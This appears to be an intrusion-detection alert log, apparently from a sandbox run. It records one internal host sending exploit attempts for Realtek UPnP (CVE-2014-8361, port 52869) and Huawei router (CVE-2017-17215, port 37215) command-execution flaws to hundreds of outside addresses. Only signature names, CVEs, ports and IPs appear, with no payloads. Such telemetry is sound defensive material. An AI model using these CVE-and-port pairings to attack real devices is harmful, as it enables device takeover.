                                                07/20/24-23:06:30.233615TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615891252869192.168.2.14191.229.242.79
                                                07/20/24-23:05:37.462705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4727652869192.168.2.14162.96.80.170
                                                07/20/24-23:05:40.395251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25652452869192.168.2.14106.223.167.59
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364037215192.168.2.14197.223.52.137
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443837215192.168.2.14120.73.179.118
                                                07/20/24-23:05:38.594036TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613454052869192.168.2.14139.117.217.229
                                                07/20/24-23:05:59.286385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3669652869192.168.2.14141.5.120.100
                                                07/20/24-23:06:01.256977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4520052869192.168.2.1494.132.77.54
                                                07/20/24-23:05:38.694694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613582252869192.168.2.1498.239.232.196
                                                07/20/24-23:06:01.368197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5882652869192.168.2.1452.242.228.39
                                                07/20/24-23:07:28.049580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5588652869192.168.2.1437.20.126.185
                                                07/20/24-23:05:36.058966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4799052869192.168.2.14179.21.144.79
                                                07/20/24-23:05:40.453690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24123652869192.168.2.14140.200.78.210
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502637215192.168.2.14157.221.191.76
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938037215192.168.2.1441.185.62.167
                                                07/20/24-23:05:58.172058TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615759252869192.168.2.14172.221.181.52
                                                07/20/24-23:05:37.487251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25165452869192.168.2.14173.89.193.209
                                                07/20/24-23:05:58.905764TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25929252869192.168.2.14191.41.212.93
                                                07/20/24-23:05:35.547888TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5605652869192.168.2.1451.156.162.59
                                                07/20/24-23:05:36.526908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070837215192.168.2.14142.240.55.156
                                                07/20/24-23:05:47.793806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615178652869192.168.2.1480.197.100.180
                                                07/20/24-23:05:59.787018TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25659652869192.168.2.14160.75.130.165
                                                07/20/24-23:05:57.598746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613823052869192.168.2.14200.129.145.85
                                                07/20/24-23:05:57.939156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614471252869192.168.2.14154.15.57.14
                                                07/20/24-23:05:58.006516TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25107452869192.168.2.1443.137.138.121
                                                07/20/24-23:05:47.999691TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615293052869192.168.2.1437.61.131.138
                                                07/20/24-23:05:56.066947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804237215192.168.2.14197.64.2.7
                                                07/20/24-23:05:58.662427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4919652869192.168.2.1443.68.128.224
                                                07/20/24-23:06:00.982926TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613589652869192.168.2.14176.198.224.23
                                                07/20/24-23:06:07.419849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855637215192.168.2.14157.59.162.37
                                                07/20/24-23:06:13.609530TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615084852869192.168.2.14178.8.150.76
                                                07/20/24-23:06:15.480465TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614786052869192.168.2.1414.172.205.140
                                                07/20/24-23:05:40.455250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751452869192.168.2.14141.250.254.239
                                                07/20/24-23:05:57.599614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3856652869192.168.2.1420.149.220.242
                                                07/20/24-23:05:59.081357TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5685252869192.168.2.14206.48.160.223
                                                07/20/24-23:05:52.570834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25438652869192.168.2.14147.243.70.201
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3748837215192.168.2.14197.188.241.66
                                                07/20/24-23:05:59.809385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195852869192.168.2.1482.229.75.23
                                                07/20/24-23:05:37.462008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3327452869192.168.2.14159.166.244.164
                                                07/20/24-23:05:57.816478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613936852869192.168.2.1498.44.175.48
                                                07/20/24-23:05:52.639265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689852869192.168.2.14181.136.224.195
                                                07/20/24-23:05:57.186863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3732652869192.168.2.1468.46.136.41
                                                07/20/24-23:05:35.300719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3574852869192.168.2.14200.98.155.108
                                                07/20/24-23:05:36.324297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839437215192.168.2.1481.154.48.7
                                                07/20/24-23:05:57.516715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085652869192.168.2.148.115.28.187
                                                07/20/24-23:05:59.139794TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23865252869192.168.2.14159.0.2.81
                                                07/20/24-23:05:59.236975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439052869192.168.2.14181.187.190.81
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780637215192.168.2.14157.183.5.146
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498237215192.168.2.1441.134.46.102
                                                07/20/24-23:05:59.589626TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23570452869192.168.2.14134.186.183.71
                                                07/20/24-23:06:58.705456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3588852869192.168.2.14194.174.131.9
                                                07/20/24-23:05:57.017538TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4126452869192.168.2.14101.18.135.140
                                                07/20/24-23:06:00.067283TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614053052869192.168.2.1462.176.218.93
                                                07/20/24-23:05:42.245949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068837215192.168.2.1441.198.19.141
                                                07/20/24-23:05:57.549014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613345652869192.168.2.14170.62.212.33
                                                07/20/24-23:05:40.330485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5687452869192.168.2.14223.214.5.89
                                                07/20/24-23:05:35.874981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3619252869192.168.2.1465.108.13.201
                                                07/20/24-23:05:37.442743TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25077052869192.168.2.14101.86.111.6
                                                07/20/24-23:06:11.469685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5486652869192.168.2.14179.38.138.95
                                                07/20/24-23:06:19.888801TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25367652869192.168.2.14112.35.155.8
                                                07/20/24-23:06:58.927502TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3869652869192.168.2.14123.128.247.166
                                                07/20/24-23:06:44.280800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4129452869192.168.2.14190.112.31.150
                                                07/20/24-23:05:39.193478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5723452869192.168.2.14163.182.5.64
                                                07/20/24-23:05:57.544145TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24399852869192.168.2.14173.94.91.109
                                                07/20/24-23:06:14.126981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614182852869192.168.2.1449.216.129.181
                                                07/20/24-23:05:34.624854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658437215192.168.2.14221.229.167.177
                                                07/20/24-23:05:38.666608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4075852869192.168.2.14146.54.173.69
                                                07/20/24-23:07:36.969912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3882052869192.168.2.14173.194.24.204
                                                07/20/24-23:05:44.342053TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25698852869192.168.2.14132.228.159.81
                                                07/20/24-23:05:57.623283TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615394052869192.168.2.14113.77.223.1
                                                07/20/24-23:06:05.219605TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615356252869192.168.2.1412.149.118.225
                                                07/20/24-23:06:08.993675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3450237215192.168.2.1434.190.114.234
                                                07/20/24-23:05:40.461168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4990852869192.168.2.14200.65.225.77
                                                07/20/24-23:06:20.035971TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24276052869192.168.2.1438.62.197.212
                                                07/20/24-23:06:06.402808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5515452869192.168.2.1484.52.21.90
                                                07/20/24-23:05:36.323623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868437215192.168.2.14157.66.61.45
                                                07/20/24-23:05:58.262276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24805252869192.168.2.14152.47.45.245
                                                07/20/24-23:05:36.328640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350637215192.168.2.14197.245.143.226
                                                07/20/24-23:05:39.602106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613899852869192.168.2.14219.185.28.245
                                                07/20/24-23:05:52.444445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5897252869192.168.2.1419.168.69.174
                                                07/20/24-23:05:56.424976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296837215192.168.2.14157.252.185.21
                                                07/20/24-23:06:54.435154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100252869192.168.2.14204.242.118.241
                                                07/20/24-23:06:38.097414TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5616252869192.168.2.14159.239.108.10
                                                07/20/24-23:05:34.648426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446037215192.168.2.14197.183.189.239
                                                07/20/24-23:05:40.331311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4423252869192.168.2.1459.44.23.42
                                                07/20/24-23:05:50.531553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972637215192.168.2.14157.37.32.20
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436637215192.168.2.14157.185.4.161
                                                07/20/24-23:06:00.620654TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5823452869192.168.2.14101.76.199.86
                                                07/20/24-23:05:38.672264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605852869192.168.2.1438.103.25.108
                                                07/20/24-23:06:00.052134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613603652869192.168.2.14219.116.120.228
                                                07/20/24-23:05:59.280739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4776252869192.168.2.14152.185.122.165
                                                07/20/24-23:06:03.066444TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5380252869192.168.2.14179.38.138.95
                                                07/20/24-23:05:37.474845TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24269652869192.168.2.14140.198.134.198
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570237215192.168.2.1496.165.35.132
                                                07/20/24-23:06:01.392409TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24451652869192.168.2.1467.151.109.138
                                                07/20/24-23:06:05.138503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4016252869192.168.2.14171.66.243.60
                                                07/20/24-23:06:13.391443TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4975252869192.168.2.14209.58.115.60
                                                07/20/24-23:07:04.503671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5958652869192.168.2.14140.104.123.65
                                                07/20/24-23:05:40.444876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5201252869192.168.2.1450.94.4.19
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399037215192.168.2.14157.200.2.216
                                                07/20/24-23:05:57.802006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4449452869192.168.2.14210.75.205.158
                                                07/20/24-23:05:59.388862TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25950052869192.168.2.1496.122.149.45
                                                07/20/24-23:07:28.537428TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614946252869192.168.2.14159.172.13.1
                                                07/20/24-23:05:57.211571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3423852869192.168.2.14156.132.102.218
                                                07/20/24-23:05:52.615827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614287852869192.168.2.14191.106.159.193
                                                07/20/24-23:06:01.644646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4714252869192.168.2.14201.173.204.219
                                                07/20/24-23:06:11.138961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26071252869192.168.2.14180.99.90.112
                                                07/20/24-23:06:34.148721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3788452869192.168.2.14148.38.185.25
                                                07/20/24-23:05:38.971654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717837215192.168.2.1483.164.28.229
                                                07/20/24-23:05:35.949656TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614711252869192.168.2.14168.99.192.8
                                                07/20/24-23:05:48.015093TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5317052869192.168.2.14166.54.252.123
                                                07/20/24-23:05:57.422953TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4650252869192.168.2.1492.226.53.187
                                                07/20/24-23:05:40.348098TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24053252869192.168.2.14107.127.41.70
                                                07/20/24-23:05:57.124977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613709852869192.168.2.14190.103.96.175
                                                07/20/24-23:06:13.552295TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25631252869192.168.2.14199.163.241.170
                                                07/20/24-23:05:35.936014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614763452869192.168.2.14202.183.171.29
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188037215192.168.2.1441.130.74.21
                                                07/20/24-23:06:30.483001TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613466852869192.168.2.14149.215.102.200
                                                07/20/24-23:05:48.172604TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3486252869192.168.2.14181.136.224.195
                                                07/20/24-23:05:56.088545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877437215192.168.2.14197.167.197.48
                                                07/20/24-23:06:05.291750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814852869192.168.2.14140.10.108.158
                                                07/20/24-23:05:37.487250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25530852869192.168.2.1431.182.192.107
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600837215192.168.2.1451.3.168.140
                                                07/20/24-23:06:01.813206TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615195452869192.168.2.1491.100.67.165
                                                07/20/24-23:05:35.774972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115252869192.168.2.1414.148.186.244
                                                07/20/24-23:05:39.469355TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614427852869192.168.2.1412.129.231.129
                                                07/20/24-23:05:37.475548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4650852869192.168.2.14131.209.58.23
                                                07/20/24-23:05:38.615405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616051452869192.168.2.14119.243.24.21
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812437215192.168.2.1441.98.172.199
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.14157.46.30.204
                                                07/20/24-23:05:36.327719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083237215192.168.2.14197.182.192.84
                                                07/20/24-23:05:57.706627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5754852869192.168.2.14123.96.193.240
                                                07/20/24-23:05:59.994984TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614933452869192.168.2.14188.68.33.45
                                                07/20/24-23:06:02.993689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614458652869192.168.2.14184.55.125.60
                                                07/20/24-23:05:46.459249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613952652869192.168.2.14138.44.159.137
                                                07/20/24-23:05:58.204539TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23554452869192.168.2.14191.96.252.254
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099037215192.168.2.1413.17.85.4
                                                07/20/24-23:05:35.409925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5691452869192.168.2.145.221.237.47
                                                07/20/24-23:06:02.093469TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23847452869192.168.2.14101.62.253.33
                                                07/20/24-23:06:35.309569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4484852869192.168.2.14221.15.178.178
                                                07/20/24-23:06:15.027910TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3596652869192.168.2.14111.11.77.117
                                                07/20/24-23:05:39.078777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736837215192.168.2.14197.252.40.127
                                                07/20/24-23:05:35.313345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4451052869192.168.2.1483.71.51.102
                                                07/20/24-23:05:45.376608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662437215192.168.2.14197.7.199.54
                                                07/20/24-23:05:37.465013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25067852869192.168.2.1489.113.83.91
                                                07/20/24-23:05:46.516600TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615274052869192.168.2.1467.42.251.191
                                                07/20/24-23:05:57.478181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614644852869192.168.2.14194.186.6.67
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670637215192.168.2.14157.198.129.124
                                                07/20/24-23:05:52.632555TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25204052869192.168.2.1446.3.114.133
                                                07/20/24-23:05:44.327630TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5742652869192.168.2.141.57.80.92
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061237215192.168.2.14157.238.185.255
                                                07/20/24-23:05:36.323611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242437215192.168.2.14197.59.198.51
                                                07/20/24-23:05:56.998513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613409252869192.168.2.14182.142.59.96
                                                07/20/24-23:06:11.138961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24959452869192.168.2.142.225.107.63
                                                07/20/24-23:06:15.408714TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592252869192.168.2.1412.193.71.48
                                                07/20/24-23:06:01.896425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4532252869192.168.2.14220.38.3.62
                                                07/20/24-23:06:03.193739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5448452869192.168.2.14179.199.183.88
                                                07/20/24-23:05:52.557712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4682652869192.168.2.14187.153.198.62
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14197.206.89.130
                                                07/20/24-23:05:40.458812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5837052869192.168.2.14143.71.98.5
                                                07/20/24-23:06:04.023969TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614854452869192.168.2.14119.215.194.1
                                                07/20/24-23:05:38.413993TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613346052869192.168.2.14126.238.252.160
                                                07/20/24-23:05:40.347403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23506652869192.168.2.14114.38.170.24
                                                07/20/24-23:06:06.896657TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24640852869192.168.2.1438.8.232.207
                                                07/20/24-23:05:35.778623TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615061052869192.168.2.1468.10.183.207
                                                07/20/24-23:06:17.699827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6081652869192.168.2.1434.68.31.177
                                                07/20/24-23:06:38.250934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25079452869192.168.2.1484.65.76.178
                                                07/20/24-23:05:52.507639TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23872452869192.168.2.14106.251.202.103
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097237215192.168.2.14157.56.159.89
                                                07/20/24-23:05:47.085193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772237215192.168.2.1441.243.139.160
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722037215192.168.2.1441.212.71.79
                                                07/20/24-23:05:52.589392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4130252869192.168.2.14108.181.93.166
                                                07/20/24-23:06:00.459661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4811252869192.168.2.1466.1.85.90
                                                07/20/24-23:05:34.659617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610037215192.168.2.14157.175.25.122
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126237215192.168.2.1441.124.78.80
                                                07/20/24-23:06:14.554681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299052869192.168.2.1487.40.14.56
                                                07/20/24-23:05:48.821008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.1441.191.148.147
